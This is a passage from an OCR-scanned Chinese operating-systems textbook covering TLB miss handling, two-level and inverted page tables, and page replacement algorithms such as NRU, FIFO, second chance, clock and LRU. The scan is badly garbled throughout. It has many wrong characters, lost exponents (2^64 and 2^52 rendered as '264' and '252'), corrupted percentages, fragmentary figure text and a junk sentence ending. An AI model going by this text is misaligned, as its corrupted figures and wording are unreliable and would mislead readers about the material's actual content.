然后 从 TLB 中 删除 一 个 项 ， 授 着 效 载 一 个 新 的 项 ， 最 后 再 执行 先前 出 
错 的 指令 。 当 然 ， 所 有 这 一 切 都 必须 在 有 限 的 儿 条 指令 中 完成 ， 因 为 
TLB 失 效 比 缺 页 中 断 发 生 的 更 加 频繁 。 


让 人 感到 惊奇 的 是 ， 如 果 TLB 大 (如 64 个 表 项 ) 到 可 以 减少 失效 
率 时 ，TLB 的 软件 管理 就 会 变 得 足够 有 效 。 这 种 方法 的 最 主要 的 好 处 
是 获得 了 一 个 非常 简单 的 MMU， 这 就 在 CPU 忆 片 上 为 高 速 缓存 以 及 其 


他 改善 性 能 的 设计 腾 出 了 相当 大 的 空间 。Uhlig 等 人 在 论文 (Uhlig, 
1994) 中 讨论 过 软件 TLB 管 理 。 


到 目前 为 止 , 已 经 开发 了 多 种 不 同 的 策略 来 改善 使 用 软件 TLB 管 
理 的 机 器 的 性 能 。 其 中 一 种 策略 是 在 减少 TLB 失 效 的 同时 ， 又 要 在 发 
生 TLB 失 效 时 减少 处 理 开 销 (Bala 等 人 ，1994) 。 为 了 减少 TLB 失 
效 ， 有 了 时候 操作 系统 能 用 “直觉 ”指出 哪些 页 面 下 一 步 可 能 会 被 用 到 并 
预先 为 它们 在 TLB 中 装载 表 项 。 例 如 ， 当 一 个 客户 进程 发 送 一 条 消息 
给 同一 台 机 器 上 的 服务 器 进程 ， 很 可 能 服务 器 将 不 得 不 立即 运行 。 了 
解 了 这 一 点 ， 当 执行 处 理 send 的 陷阱 时 ， 系 统 也 可 以 找到 服务 器 的 代 
码 页 、 数 据 页 以 及 堆栈 页 ， 并 在 有 可 能 导致 TLB 失 效 前 把 它们 装载 到 
TLB 中 。 


无 论 是 用 硬件 还 是 用 软件 来 处 理 TLB 失 效 ， 常 见方 法 都 是 找到 页 
表 并 执行 索引 操作 以 定位 将 要 访问 的 页 面 。 用 软件 做 这 样 的 搜索 的 问 
题 是 ， 页 表 可 能 不 在 TLB 中 ， 这 就 会 导致 处 理 过 程 中 的 额外 的 TLB 失 
效 。 可 以 通过 在 内 存 中 的 固定 位 置 维护 一 个 大 的 (如 4KB) TLB 表 项 
的 软件 高 速 缓存 (该 高 速 缓存 的 页 面 总 是 被 保存 在 TLB 中 ) 来 减少 
TLB 失 效 。 通 过 首先 检查 软件 高 速 缓 存 ， 操 作 系 统 能 够 实质 性 地 减少 
TLB 失 效 。 


当 使 用 软件 TLB 管 理 时 ， 一 个 基本 要 求 是 要 理解 两 种 不 同 的 TLB 
失效 的 区 别 在 哪里 。 当 一 个 页 面 访问 在 内 存 中 而 不 在 TLB 中 时 ， 将 产 


生 软 失效 (soft miss) 。 那 么 此 时 所 要 做 的 就 是 更 新 一 下 TLB， 不 需要 
产生 磁盘 IO。 典 型 的 处 理 需要 10~20 个 机 器 指令 并 花费 几 个 纳 秒 完成 
操作 。 相 反 ， 当 页 面 本 身 不 在 内 存 中 (当然 也 不 在 TLB 中 ) 时 ， 将 产 
生硬 失效 。 此 刻 需 要 一 次 磁盘 存 取 以 装 入 该 页 面 ， 这 个 过 程 大 概 需要 
几 毫 秒 。 硬 失效 的 处 理 时 间 往 往 是 软 失效 的 百 万 倍 。 


3.3.4 针对 大 内 存 的 页 表 


在 原 有 的 内 存 页 表 的 方案 之 上 ， 引 入 快 表 (TLB) 可 以 用 来 加 快 
虚拟 地 址 到 物理 地 址 的 转换 。 不 过 这 不 是 惟一 需要 解决 的 问题 ， 另 一 
个 问题 是 怎样 处 理 巨 大 的 虚拟 地 址 空间 。 下 面 将 讨论 两 种 解决 方法 。 


第 一 种 方法 是 采用 多 级 页 表 。 一 个 人 简 蛙 的 例子 如 图 3-13 所 示 。 在 图 
3-13a 中 ，32 位 的 虚拟 地 址 被 划分 为 10 位 的 PT1 域 、10 位 的 PT2 域 和 12 位 
的 Offset (MWEE) 域 。 因 为 偏 移 量 是 12 位 ， 所 以 页 面 长 度 是 4KB， 共 
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引入 多 级 页 表 的 原因 是 避免 把 全 部 页 表 一 直人 存在 内 存 中 。 特 别 
征 那些 从 不 需要 的 页 表 就 不 应 该 保留 。 比 如 一 个 需要 12MB 内 存 的 进 
程 ， 其 最 撒 端 是 4MB 的 程序 正文 段 ， 后 面 是 4MB 的 数据 段 ， 顶 端 是 
4MB 的 堆栈 段 ， 在 数据 段 上 方 和 堆栈 段 下 方 之 间 是 大 量 根本 没有 使 用 
的 空间 区 。 


考察 图 3-13b 例 子 中 的 二 级 页 表 是 如 何 工 作 的 。 在 左边 是 顶级 页 
表 ， 它 具有 1024 个 表 项 ， 对 应 于 10 位 的 PT1 域 。 当 一 个 虚拟 地 址 被 送 到 
MMU 时 ，MMU 首 先 提 取 PT1 域 并 把 该 值 作为 访问 顶级 页 表 的 索引 。 因 


为 整个 4GB (32 位 ) 虚拟 地 址 空间 已 经 被 分 成 1024 个 4MB 的 块 ， 所 以 
这 1024 个 表 项 中 的 每 一 个 都 表示 4MB 的 虚拟 地 址 空间 。 


内 存 顶 部 
4MB 的 页 表 


位 10 10 12 


a) 


b) 


Al 3-13 a) 一 个 有 两 个 页 表 域 的 32 位 地 位 ，b) 二 级 页 表 


由 索引 顶级 页 表 得 到 的 表 项 中 含有 二 级 页 表 的 地 址 或 页 框 号 。 顶 
级 页 表 的 表 项 0 指向 程序 正文 的 页 表 ， 表 项 1 指向 数据 的 页 表 ， 表 项 


1023 指 向 堆栈 的 页 表 ， 其 他 的 表 项 (用 阴影 表示 的 ) 未 用 。 现 在 把 PT2 
域 作 为 访问 选 定 的 二 级 页 表 的 索引 ， 以 便 找 到 该 虚拟 页 面 的 对 应 页 杠 


[mj 


PS 


下 面 看 一 个 示例 ， 考 虑 32 位 虚拟 地 址 0x00403004 (十 进 制 4 206 
596) 位 于 数据 部 分 12 292 字 市 处 。 它 的 虚拟 地 址 对 应 PT1=1，PT2=2， 
Offset=4。MMU 首 和 完 用 PT1 作 为 索引 访问 顶级 页 表 得 到 表 项 1， 它 对 应 
的 地 址 范围 是 4M~8M。 然 后 ， 它 用 PT2 作 为 索引 访问 刚刚 找到 的 二 级 
页 表 并 得 到 表 项 3， 它 对 应 的 虚拟 地 址 范围 是 在 它 的 4M 块 内 的 12 288~ 
16 383 ( 即 绝对 地 址 4 206 592~4 210 687) 。 这 个 表 项 含有 虚拟 地 址 
0x00403004 所 在 页 面 的 页 框 号 。 如 采 该 页 面 不 在 内 存 中 ， 页 表 项 中 
的 “在 /不 在 ”位 将 是 0， 引 发 一 次 缺 页 中 断 。 如 果 该 页 面 在 内 存 中 ， 从 二 
级 页 表 中 得 到 的 页 框 号 将 与 偏 移 量 (4) 结合 形成 物理 地 址 。 该 地 址 被 
放 到 总 线 上 并 送 到 内 存 中 。 


值得 注意 的 是 ， 虽 然 在 图 3-13 中 虚拟 地 址 空间 超过 100 万 个 页 面 ， 
实际 上 只 需要 四 个 页 表 : 顶级 页 表 以 及 0~4M (正文 段 )、4M~8M 
(数据 段 ) 和 顶端 4M (堆栈 段 ) 的 二 级 页 表 。 顶 级 页 表 中 1021 个 表 项 
的 “在 /不 在 ”位 都 被 设 为 0， 当 访问 它们 时 强制 产生 一 个 缺 页 中 断 。 如 果 
发 生 了 这 种 情况 ， 操 作 系 统 将 注意 到 进程 正在 试图 访问 一 个 不 希望 被 
访问 的 地 址 ， 并 采取 适当 的 行动 ， 比 如 向 进程 发 出 一 个 信号 或 杀 死 进 


程 等 。 在 这 个 例子 中 的 各 种 长 度 选择 的 都 是 整数 ， 并 且 选 择 PT1 与 PT2 
等 长 ， 但 在 实际 中 也 可 能 是 其 他 的 值 。 


图 3-13 所 示 的 二 级 页 表 可 扩充 为 三 级 、 四 级 或 更 多 级 。 级 别 越 多 ， 
灵活 性 束 越 大 ， 但 页 表 超 过 三 级 会 市 来 更 大 的 复杂 性 ， 这 样 做 是 否 值 
得 令 人 怀疑 。 


2. 倒 排 页 表 


对 32 位 虚拟 地 址 空间 ， 多 级 页 表 可 以 很 好 地 发 挥 作用 。 但 是 ， 随 
着 64 位 计算 机 变 得 更 加 普遍 ， 人 情况 发 生 了 彻底 的 变化 。 如 果 现 在 的 地 
址 空间 是 264 字 节 ， 页 面 大 小 为 4KB， 我 们 需要 一 个 有 252 个 表 项 的 页 
表 。 如 果 每 一 个 表 项 8 个 字 节 ， 那 么 整个 页 表 就 会 超过 3000 万 GB 
(30PB) 。 仅 仅 为 页 表 耗 费 3000 万 GB 不 是 个 好 主意 (现在 不 是 ， 可 能 
以 后 几 年 也 不 是 ) 。 因 而 ， 具 有 64 位 分 页 虚拟 地 址 空间 的 系统 需要 一 
个 不 同 的 解决 方案 。 


解决 方案 之 一 就 是 使 用 倒 排 页 表 (inverted page table) 。 在 这 种 设 
计 中 ， 在 实际 内 存 中 每 一 个 页 框 有 一 个 表 项 ， 而 不 是 每 一 个 虚拟 页 面 
有 一 个 表 项 。 例 如 ， 对 于 64 位 虚拟 地 址 ，4KB 的 页 ，1GB 的 RAM, 一 
个 倒 排 页 表 仅 需要 262 144 个 页 表 项 。 表 项 记录 哪 一 个 (进程 ， 虚 拟 页 
面 ) 对 定位 于 该 页 框 。 


里 然 倒 排 页 表 市 省 了 大 量 的 空间 (至 少 当 虚拟 地 址 空间 比 物理 内 
存 大 得 多 的 时 候 是 这 样 的 ) ， 但 它 也 有 严重 的 不 足 : 从 虚拟 地 址 到 物 
理 地 址 的 转换 会 变 得 很 困难 。 当 进程 n 访 问 虚拟 页 面 p 时 ， 便 件 不 再 能 
通过 把 p 当 作 指 癌 页 表 的 一 个 索引 来 码 找 物理 页 框 。 取 而 代 之 的 是 ， 它 
必须 搜索 整个 倒 排 页 表 来 查找 某 一 个 表 项 (n, p) 。 此 外 ， 该 搜索 必 
须 对 每 一 个 内 存 访 问 操作 都 要 执行 一 次 ， 而 不 仅仅 是 在 发 生 缺 页 中 断 
时 执行 。 每 一 次 内 存 访问 操作 都 要 查找 一 个 256K 的 表 是 不 会 让 你 的 机 
are {T tei RRAY ° 


走出 这 种 两 难 局 面 的 办 法 是 使 用 TLB。 如 有 果 TLB 能 够 记录 所 有 频繁 
使 用 的 页 面 ， 地 址 转换 就 可 能 变 得 像 通常 的 页 表 一 样 快 。 但 是 ， 当 发 
生 TLB 失 效 时 ， 需 要 用 软件 搜索 整个 倒 排 页 表 。 一 个 可 行 的 实现 该 搜 
索 的 方法 是 建立 一 张 散 列表 ， 用 虚拟 地 址 来 散 列 。 当 前 所 有 在 内 存 中 
的 具有 相同 散 列 值 的 虚拟 页 面 被 链接 在 一 起 ， 如 图 3-14 所 示 。 如 采 散 列 
表 中 的 档 数 与 机 右 中 物理 页 面 数 一 样 多 ， 那 么 获 列 表 的 冲突 链 的 平均 
长 度 将 会 是 1 个 表 项 ， 这 将 会 大 大 提高 映射 速度 。 一 旦 页 框 号 被 找到 ， 
新 的 〈 虚 拟 页 号 ， 物 理 页 框 号 ) 对 就 会 被 装载 到 TLB 中 。 


传统 页 表 ， 每 页 一 个 
页 表 项 ， 共 2” 个 页 面 
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1GB 物 理 内 存 有 
2'8 个 4KB 页 框 散 列 表 
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以 虚拟 页 面 对 虚拟 页 面 进行 散 列 。 A 
作为 索引 计算 ， 并 作为 索引 页 框 
人 


图 3-14 传统 页 表 与 倒 排 页 表 的 对 比 


倒 排 页 表 在 64 位 机 器 中 很 常见 ， 因 为 在 64 位 机 器 中 即使 使 用 了 大 
页 面 ， 页 表 项 的 数量 还 是 很 庞大 的 。 例 如 ， 对 于 4MB 页 面 和 64 位 虚拟 
地 址 ， 需 要 24 个 页 表 项 。 人 处理 大 虚 存 的 其 他 方法 可 参见 Talluri 等 人 的 
论文 (1995) 。 


3.4 页 面 置 换算 法 


当 发 生 缺 页 中 断 时 ， 操 作 系统 必须 在 内 存 中 选择 一 个 页 面 将 其 换 
出 内 存 ， 以 便 为 即将 调 入 的 页 面 腾 出 空间 。 如 采 要 换 出 的 页 面 在 内 存 
驻 留 期 间 已 经 被 修改 过 ， 束 必须 把 它 写 回 磁盘 以 更 新 该 页 面 在 磁 表 上 
的 副本 ， 如 果 该 页 面 没 有 被 修改 过 〈 如 一 个 包含 程序 正文 的 页 面 ) ， 
那么 它 在 做 一 上 的 副本 已 经 是 最 新 的 ， 不 需要 回 写 。 和 直接 用 调 入 的 页 
面 获 盖 掉 个 淘 状 的 页 面 就 可 以 了 。 


当 发 生 缺 页 中 断 时 ， 虽 然 可 以 随机 地 选择 一 个 页 面 来 置换 ， 但 是 
如 采 每 次 都 选择 不 常 使 用 的 页 面 会 提升 系统 的 性 能 。 如 果 一 个 被 频 索 
使 用 的 页 面 被 置换 出 内 存 ， 很 可 能 它 在 很 短 时 间 内 又 要 被 调 入 内 人 存 ， 
这 会 市 来 不 必要 的 开销 。 人 们 已 经 从 理论 和 实践 两 个 方面 对 页 面 置换 
算法 进行 了 深入 的 研究 。 下 面 我 们 将 介绍 儿 个 最 重要 的 算法 。 


有 必要 指出 , “页 面 置换 ”问题 在 计算 机 设计 的 其 他 领域 中 也 会 同 
样 发 生 。 例 如 ， 多 数 计算 机 把 最 近 使 用 过 的 32 字 市 或 64 子 市 的 存储 块 
保存 在 一 个 或 多 个 高 速 缓存 中 。 当 这 些 高 速 缓存 存 满 之 后 吏 必 须 选 择 
一 些 块 丢 斥 。 除 了 化 费时 间 较 短 外 《有 关 操 作 必 须 在 看 干 纳 秒 中 完 
成 ， 而 不 是 像 页 面 置换 那样 在 微 秒 级 上 完成 ) ， 这 个 问题 同 页 面 置换 
问题 完全 一 样 。 之 所 以 花费 时 间 较 短 ， 其 原因 是 丢掉 的 高 速 缓存 块 可 
以 从 内 存 中 获得 ， 而 内 存 既 没有 寻 道 时 间 也 不 存在 旋转 延迟 。 
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并 且 要 访问 一 个 不 在 高 速 缓存 中 的 页 面 时 ， 融 必须 要 置换 高 速 缓存 中 
的 某 个 web 页 面 。 由 于 在 高 速 缓存 中 的 Web 页 面 不 会 被 修改 ， 因 此 在 
位 盘 中 的 Web 页 面 的 副本 总 古 最 新 的 。 而 在 虚拟 存储 系统 中 ， 内 存 中 
的 页 面 既 可 能 是 干净 页 面 也 可 能 是 脏 页 面 。 除 此 之 外 ， 置 换 Web 页 面 
和 置换 虚拟 内 存 中 的 页 面 需要 考虑 的 问题 是 类 似 的 。 


在 接 下 来 讨论 的 所 有 页 面 置换 算法 中 都 存在 一 个 问题 : 当 需 要 从 
内 存 中 换 出 某 个 页 面 时 ， 它 是 否 只 能 是 缺 页 进程 本 身 的 页 面 ? 这 个 要 
换 出 的 页 面 是 否 可 以 属于 另外 一 个 进程 ? 在 前 一 种 情况 下 ， 可 以 有 效 
地 将 每 一 个 进程 限定 在 固定 的 页 面 数目 内 ， 后 一 种 情况 则 不 能 。 这 两 
种 情况 都 是 可 能 的 。 在 3.5.1 节 我 们 会 继续 讨论 这 一 点 。 


3.41 最 优 页 面 置换 算法 


很 容易 吏 可 以 描述 出 最 好 的 页 面 置换 算法 ， 虽 然 此 算法 不 可 能 实 
现 。 该 算法 是 这 样 工 作 的 ， 在 缺 页 中 断 发 生 时 ， 有 些 页 面 在 内 存 中 ， 
其 中 有 一 个 页 面 (包含 紧 接着 的 下 一 条 指令 的 那个 页 面 ) 将 很 快 被 访 
问 ， 其 他 页 面 则 可 能 要 到 10、100 或 1000 条 指令 后 才 会 被 访问 ， 每 个 页 
面 都 可 以 用 在 该 页 面 首次 被 访问 前 所 要 执行 的 指令 数 作 为 标记 。 
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在 800 万 条 指令 内 不 会 被 使 用 ， 另 外 一 个 页 面 在 600 万 条 指令 内 不 会 被 
使 用 ， 则 置换 前 一 个 页 面 ， 从 而 把 因 需 要 调 入 这 个 页 面 而 发 生 的 缺 页 
中 断 推 迟到 将 来 ， 越 久 越 好 。 计 算 机 也 像 人 一 样 ， 硕 望 把 不 愉快 的 事 
情 尽 可 能 地 往 后 拖延 。 


这 个 算法 惟一 的 问题 束 是 它 是 无 法 实现 的 。 当 缺 页 中 断 发 生 时 ， 
操作 系统 无 法 知道 各 个 页 面 下 一 次 将 在 什么 时 候 被 访问 。 (在 最 短 作 
业 优 先 调 度 算法 中 ， 我 们 曾 遇 到 同样 的 情况 ， 即 系统 如 何 知 道 哪个 作 
业 是 最 短 的 呢 ? ) 当然 ， 通 过 首先 在 仿真 程序 上 运行 程序 ， 跟 踪 所 有 
页 面 的 访问 情况 ， 在 第 二 次 运行 时 利用 第 一 次 运行 时 收集 的 信息 是 可 
以 实现 最 优 页 面 置换 算法 的 。 


用 这 种 方式 ， 我 们 可 以 通过 最 优 页 面 置 换算 法 对 其 他 可 实现 算法 
的 性 能 进行 比较 。 如 采 操 作 系 统 达到 的 页 面 置换 性 能 只 比 最 优 算法 过 
19%6， 那 么 即使 花费 大 量 的 精力 来 寻找 更 好 的 算法 最 多 也 只 能 换 来 1% 
的 性 能 提高 。 


为 了 避免 混淆 ， 读 者 必须 清楚 以 上 页 面 访问 情况 的 记录 只 针对 刚 
刚 被 测试 过 的 程序 和 它 的 一 个 特定 的 输入 ， 因 此 从 中 导出 的 性 能 最 好 
的 页 面 置换 算法 也 只 是 针对 这 个 特定 的 程序 和 输入 数据 的 。 虽 然 这 个 
方法 对 评价 页 面 置 换算 法 很 有 用 ， 但 它 在 实际 系统 中 却 不 能 使 用 。 下 
面 我 们 将 研究 可 以 在 实际 系统 中 使 用 的 算法 。 


3.4.2 ”最 近 未 使 用 页 面 置 换算 法 


为 使 操作 系统 能 够 收集 有 用 的 统计 信息 ， 在 大 部 分 具有 虚拟 内 存 
的 计算 机 中 ， 系 统 为 每 一 页 面 设 置 了 两 个 状态 位 。 当 页 面 被 访问 ( 读 
KS) 时 设置 R 位 ， 当 页 面 ( 即 修改 页 面 ) 被 写 入 时 设置 M 位 。 这 些 
位 包含 在 页 表 项 中 ， 如 图 3-11 所 示 。 每 次 访问 内 存 时 更 新 这 些 位 ， 
此 由 硬件 来 设置 它们 是 必要 的 。 一 旦 设置 时 位 为 1， 它 就 一 直 保持 1 直 
到 操作 系统 将 它 复 位 。 


如 果 硬 件 没有 这 些 位 ， 则 可 以 进行 以 下 的 软件 模拟 : 当局 动 一 个 
进程 时 ， 将 其 所 有 的 页 面 都 标记 为 不 在 内 存 ; 一 旦 访问 任何 一 个 页 面 
就 会 引发 一 次 缺 页 中 断 ， 此 时 操作 系统 就 可 以 设置 R 位 〈 在 它 的 内 部 
表格 中 ) ， 修 改 页 表 项 使 其 指向 正确 的 页 面 ， 并 设 为 READ ONLY 模 
式 ， 然 后 重新 启动 引起 缺 页 中 断 的 指令 ;如 果 随 后 对 该 页 面 的 修改 又 
引发 一 次 缺 页 中 断 ， 则 操作 系统 设置 这 个 页 面 的 M 位 并 将 其 改 为 
READ/WRITE 模 式 。 


可 以 用 R 位 和 M 位 来 构造 一 个 简单 的 页 面 置换 算法 : 当局 动 一 个 
进程 时 ， 它 的 所 有 页 面 的 两 个 位 都 由 操作 系统 设置 成 0，R 位 被 定期 地 
(比如 在 每 次 时 钟 中 断 时 ) 清 零 ， 以 区 别 最 近 没 有 被 访问 的 页 面 和 被 
访问 的 页 面 。 


当 发 生 缺 页 中 断 时 ， 操 作 系统 检查 所 有 的 页 面 并 根据 它们 当前 的 
R 位 和 M 位 的 值 ， 把 它们 分 为 4 类 : 


BOR: 没有 被 访问 ， 没 有 被 修改 。 


第 1 类 : 没有 被 访问 ， 已 被 修改 。 


第 2 类 : 已 被 访问 ， 没 有 被 修改 。 


第 3 类 : 已 被 访问 ， 已 被 修改 。 


尽管 第 1 类 初 看 起 来 似乎 是 不 可 能 的 ， 但 是 一 个 第 3 类 的 页 面 在 它 
的 R 位 被 时 钟 中 断 清 零 后 就 成 了 第 1 类 。 时 钟 中 断 不 清除 M 位 是 因为 在 
决定 一 个 页 面 是 否 需 要 写 回 磁盘 时 将 用 到 这 个 信息 。 清 除 R 位 而 不 清 
除 M 位 产生 了 第 1 类 页 面 。 


NRU (Not Recently Used, BEREH) 算法 随机 地 从 类 编号 最 
小 的 非 空 类 中 挑选 一 个 页 面 淘汰 之 。 这 个 算法 隐 含 的 意思 是 ， 在 最 近 
一 个 时 钟 滴答 中 (典型 的 时 间 是 大 约 20ms) 淘汰 一 个 没有 被 访问 的 已 
修改 页 面 要 比 淘汰 一 个 被 频繁 使 用 的 “干净 ”页面 好 。NRU 主 要 优点 是 
易于 理解 和 能 够 有 效 地 被 实现 ， 虽 然 它 的 性 能 不 是 最 好 的 ， 但 是 已 经 
够 用 了 。 


3.43 ”先进 先 出 页 面 置 换算 法 


男 一 种 开销 较 小 的 页 面 置换 算法 是 FIFO (First-In First-Out， 先 进 
先 出 ) 算法 。 为 了 解释 它 是 怎样 工作 的 ， 我 们 设想 有 一 个 超级 市 场 ， 
它 有 足够 的 货架 能 展示 k 种 不 同 的 商品。 有 一 天 ， 某 家 公司 介绍 了 一 种 
新 的 方便 食品 一 一 即食 的 、 冷 冻 干燥 的 、 可 以 用 微波 炉 加 热 的 酸 乳 
酪 ， 这 个 产品 非常 成 功 ， 所 以 容量 有 限 的 超市 必须 撤 掉 一 种 旧 的 商品 
以 便 能 够 展示 该 新 产品 。 


一 种 可 能 的 解决 方法 就 是 找到 该 超级 市 场 中 库存 时 间 最 长 的 商品 
并 将 其 替换 掉 《比如 某 种 120 年 以 前 就 开始 卖 的 商品 ) ， 理 由 是 现在 已 
经 没有 人 喜欢 它 了 。 这 实际 上 相当 于 超级 市 场 有 一 个 按照 引进 时 间 排 
列 的 所 有 商品 的 链表 。 新 的 商品 被 加 a 到 链表 的 尾部 ， 链 表 涉 上 的 商品 
则 被 撤 控 。 


同样 的 思想 也 可 以 应 用 在 页 面 置 换算 法 中 。 由 操作 系统 维护 一 个 
所 有 当前 在 内 存 中 的 页 面 的 链表 ， 最 新 进入 的 页 面 放 在 表 尾 ， 最 久 进 
入 的 页 面 放 在 表 头 。 当 发 生 缺 页 中 断 时 ， 淘 汰 表 头 的 页 面 并 把 新 调 入 
的 页 面 加 到 表 尾 。 当 FIFO 用 在 超级 市 场 时 ， 可 能 会 淘汰 剃 须 襄 ， 但 也 
可 能 淘汰 面粉 、 盐 或 黄油 这 一 类 常用 商品 。 因此 ， 当 它 应 用 在 计算 机 


上 时 也 会 引起 同样 的 问题 ， 由 于 这 一 原因 ， 很 少 使 用 纯粹 的 FIFO 算 
法 。 


3.4.4 第 二 次 机 会 页 面 置换 算法 


FIFO 算 法 可 能 会 把 经 党 使 用 的 页 面 置换 出 去 ， 为 了 避免 这 一 问 
题 ， 对 该 算法 做 一 个 简单 的 修改 : 检查 最 老 页 面 的 R 位 。 如 末 R 位 是 0， 
那么 这 个 页 面 既 老 义 没有 被 使 用 ， 可 以 立刻 置换 掉 ， 如 果 是 1， 束 将 R 
位 清 0， 并 把 该 页 面 放 到 链表 的 尾 端 ， 修 改 它 的 狼 入 时 间 使 它 瑟 像 刚 装 
入 的 一 样 ， 然 后 继续 搜索 。 


这 一 算法 称 为 第 二 次 机 会 (second chance) 算法 ， 如 图 3-15 所 示 。 
在 图 3-15a 中 我 们 看 到 页 面 A 到 页 面 H 按 照 进 入 内 存 的 时 间 顺 序 保存 在 链 
表 中 。 
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图 3-15 第 二 次 机 会 算法 的 操作 (页 面 上 面 的 数字 是 装 入 时 间 ) : a) 
按 先进 先 出 的 方法 排列 的 页 面 ; b) 在 时 间 20 发 生 缺 页 中 断 并 且 A 的 R 位 


已 经 设置 时 的 页 面 链表 


假设 在 时 间 20 发 生 了 一 次 缺 页 中 断 ， 这 时 最 老 的 页 面 征 A， 它 是 在 
时 刻 0 到 达 的 。 如 果 A 的 R 位 是 0， 则 将 它 淘汰 出 内 存 ， 或 者 把 它 写 回 磁 
È (如 果 它 已 被 修改 过 ) ， 或 者 只 是 简单 地 放弃 WREE" 

EW) ; 男 一 方面 ， 如 果 其 R 位 已 经 设置 了 ， 则 将 A 放 到 链表 的 尾部 并 
且 重 新 设置 “ 装 入 时 间 ” 为 当前 时 刻 (20) ， 然 后 清除 R 位 。 然 后 从 B 页 
面 开始 继续 搜索 合适 的 页 面 。 


第 二 次 机 会 算法 殉 是 寻找 一 个 最 近 的 时 钟 间隔 以 来 没有 被 访问 过 
的 页 面 。 如 条 所 有 的 页 面 都 被 访问 过 了 ， 该 算法 束 简 化 为 纯粹 的 FIFO 
算法 。 特 别 地 ， 想 象 一 下 ， 假 设 图 3-15a 中 所 有 的 页 面 的 R 位 都 被 设置 
了 ， 操 作 系 统 将 会 一 个 接 一 个 地 把 每 个 页 面 都 移动 到 链表 的 尾部 并 清 
除 修 移动 的 页 面 的 R 位 。 最 后 算法 又 将 回 到 页 面 A， 此 时 它 的 R 位 已 经 
要 清除 了， 因此 A 页 面 将 被 淘汰 ， 所 以 这 个 算法 总 是 可 以 结束 的 。 


3.4.5 ”时钟 页 面 置 换算 法 


尽管 第 二 次 机 会 算法 生 一 个 比较 合理 的 算法 ， 但 它 经 前 要 在 链表 
中 移动 页 面 ， 既 降低 了 效率 勾 不 是 很 有 必要 。 一 个 更 好 的 办 法 是 把 所 
有 的 页 面 都 保存 在 一 个 类 似 钟 面 的 环形 链表 中 ， 一 个 表 针 指 癌 最 老 的 
页 面 ， 如 图 3-16 所 示 。 


当 发 生 缺 页 中 断 时 ， 检 
ail 查 表 针 指向 的 页 面 。 根 
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图 3-16 时 钟 页 面 置换 算法 


当 发 生 缺 页 中 断 时 ， 算 法 首先 检查 表 针 指向 的 页 面 ， 如 果 它 的 R 位 
征 0 惑 淘汰 该 页 面 ， 并 把 新 的 页 面 插入 这 个 位 置 ， 然 后 把 表 针 前 移 一 个 
位 置 ， 如 采 R 位 是 1 整 清 除 R 位 并 把 表 针 前 移 一 个 位 置 ， 重 复 这 个 过 程 直 


到 找到 了 一 个 R 位 为 0 的 页 面 为 目 。 了 解 了 这 个 算法 的 工作 方式 ， 吏 明 
白 为 什么 它 被 称 为 时 钟 (clock) 算法 了 。 


3.4.6 ”最 近 最 少 使 用 页 面 置换 算法 


对 最 优 算法 的 一 个 很 好 的 近似 是 基于 这 样 的 观察 : 在 前 面 儿 条 指 
令 中 频 莹 使 用 的 页 面 很 可 能 在 后 面 的 几 条 指令 中 被 使 用 。 反 过 来 说 ， 
已 经 很 久 没有 使 用 的 页 面 很 有 可 能 在 未 来 较 长 的 一 段 时 间 内 仍然 不 会 
被 使 用 。 这 个 思想 提示 了 一 个 可 实现 的 算法 : 在 缺 页 中 断 发 生 时 ， 置 
换 未 使 用 时 间 最 长 的 页 面 。 这 个 策略 称 为 LRU (Least Recently Used, 
最 近 最 少 使 用 ) 页 面 置换 算法 。 


里 然 LRU 在 理论 上 是 可 以 实现 的 ， 但 代价 很 品 。 为 了 完全 实现 
LRU， 需 要 在 内 存 中 维护 一 个 所 有 页 面 的 链表 ， 最 近 最 多 使 用 的 页 面 
在 表 头 ， 最 近 最 少 使 用 的 页 面 在 表 尾 。 困 难 的 是 在 每 次 访问 内 存 时 都 
必须 要 更 新 整个 链表 。 在 链表 中 找到 一 个 页 面 ， 删 除 它 ， 然 后 把 它 移 
动 到 表 头 是 一 个 非常 费时 的 操作 ， 即 使 使 用 硬件 实现 也 一 样 费时 〈 假 
设 有 这 样 的 硬件 ) 。 


然而 ， 还 是 有 一 些 使 用 特殊 硬件 实现 LRU 的 方法 。 我 们 先 考虑 一 
个 最 简单 的 方法 。 这 个 方法 要 求 硬 件 有 一 个 64 位 计数 亏 C， 它 在 每 条 指 
令 执行 完 后 目 动 加 1， 每 个 页 表 项 必须 有 一 个 足够 容纳 这 个 计数 器 值 的 
域 。 在 每 次 访问 内 存 后 ， 将 当前 的 C 值 保存 到 被 访问 页 面 的 页 表 项 中 。 
一 且 发 生 缺 页 中 断 ， 操 作 系统 就 检查 所 有 页 表 项 中 计数 器 的 值 ， 找 到 
值 最 小 的 一 个 页 面 ， 这 个 页 面 加 是 最 近 最 少 使 用 的 页 面 。 


现在 让 我 们 看 一 看 第 二 个 硬件 实现 的 LRU 算 法 。 在 一 个 有 n 个 页 框 
的 机 右 中 ，LRU 便 件 可 以 维持 一 个 初 值 为 0 的 nxn 位 的 矩阵 。 当 访问 到 
页 框 k 时 ， 人 硬件 站 完 把 k 行 的 位 都 设置 成 1， 再 把 k 列 的 位 都 设 鞋 成 0。 在 
任何 时 刻 ， 二 进 制 数值 最 小 的 行 束 是 最 近 最 少 使 用 的 ， 第 二 小 的 行 是 
下 一 个 最 近 最 少 使 用 的 ， 以 此 类 推 。 这 个 算法 的 工作 过 程 可 以 用 图 3-17 
所 示 的 实例 说 明 ， 该 实例 中 有 4 个 页 框 ， 页 面 访问 次 序 为 : 


0123210323 


访问 页 面 0 后 的 状态 如 图 3-17a 所 示 ， 访 问 页 1 后 的 状态 如 图 3-17b 所 
示 ， 以 此 类 推 。 


图 3-17 使 用 和 矩阵 的 LRU， 页 面 以 0、1、2、3、2、1、0、3、2、3 次 
序 访 问 


3.4.7 ”用 软件 模拟 LRU 


前 面 两 种 LRU 算 法 虽然 在 理论 上 都 是 可 以 实现 的 ， 但 只 有 非常 少 
的 计算 机 拥有 这 种 硬件 。 因 此 ， 需 要 一 个 能 用 软件 实现 的 解决 方案 。 
一 种 可 能 的 方案 称 为 NFU (Not Frequently Used， 最 不 常用 ) 算法 。 该 
算法 将 每 个 页 面 与 一 个 软件 计数 器 相 关联 ， 计 数 右 的 初 值 为 0° 每 次 时 
钟 中 断 时 ， 由 操作 系统 扫描 内 存 中 所 有 的 页 面 ， 将 每 个 页 面 的 R 位 CE 
的 值 是 0 或 1) 加 到 它 的 计数 器 上 。 这 个 计数 右 大 体 上 跟踪 了 各 个 页 面 
被 访问 的 频繁 程度 。 发 生 缺 页 中 断 时 ， 则 置换 计数 右 值 最 小 的 页 面 。 


